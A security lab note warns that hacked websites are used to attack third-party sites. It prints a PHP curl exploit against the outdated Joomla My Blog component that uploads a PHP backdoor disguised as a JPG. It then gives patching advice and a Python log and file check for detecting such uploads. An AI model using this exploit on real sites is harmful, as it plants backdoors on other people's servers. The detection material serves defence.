Hacked Sites Help Hack Third-Party Sites

Labs Note

Just a reminder that your hacked site may be used to anonymously hack third-party sites.

This Joomla com_Myblog exploit script was found on one hacked site:

$uploadfile="tq.php.jpg";
$ch = curl_init("http://<third-party-site.com>/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

This code uploads a PHP backdoor disguised as a JPG file using a vulnerability in a really old (and, it looks like, no longer supported) My Blog Joomla component.

Some webmasters still use it on Joomla 1.5.x sites, and this exploit has proven to be effective, as you can read in this blogpost. This blogpost also provides a quick fix for this vulnerable component. Apply it if you still use legacy versions of this component, but also consider upgrading your site to use software that is up to date (both Joomla and third-party components, plugins and templates).
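To check whether your own site has received this kind of upload request, the following added example (not code from the hacked site or from the My Blog component) flags POSTs to the com_myblog ajaxupload task in an access log and tests whether an image-named file looks like disguised PHP. The combined log format, the sample log lines and both function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2015:10:01:02 +0000] "POST /index.php?option=com_myblog&task=ajaxupload HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.4 - - [12/Mar/2015:10:02:10 +0000] "GET /index.php?option=com_myblog&task=view HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2015:10:03:44 +0000] "POST /index.php?task=AjaxUpload&option=com%5Fmyblog HTTP/1.1" 200 298 "-" "-"',
]

# Assumed format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
PHP_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}


def find_myblog_upload_posts(lines):
    """Return (ip, time, status) for each POST to com_myblog's ajaxupload task."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, when, method, target, status = m.groups()
        # parse_qs percent-decodes values, so com%5Fmyblog is normalised as well
        query = parse_qs(urlsplit(target).query)
        option = [v.lower() for v in query.get("option", [])]
        task = [v.lower() for v in query.get("task", [])]
        if method == "POST" and "com_myblog" in option and "ajaxupload" in task:
            hits.append((ip, when, int(status)))
    return hits


def looks_like_disguised_php(filename, content):
    """True for an image-named file with a PHP name component or PHP code inside."""
    name = filename.lower()
    if not name.endswith(IMAGE_EXT):
        return False
    inner = name.split(".")[1:-1]  # name parts between the base name and final extension
    return any(p in PHP_EXT for p in inner) or b"<?php" in content.lower()


if __name__ == "__main__":
    for hit in find_myblog_upload_posts(SAMPLE_LOG):
        print("suspicious upload request:", hit)
    print(looks_like_disguised_php("tq.php.jpg", b"\xff\xd8\xff\xe0JFIF"))
```

A 200 status on a flagged request means the component answered, so the upload directories should then be reviewed with the file check.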
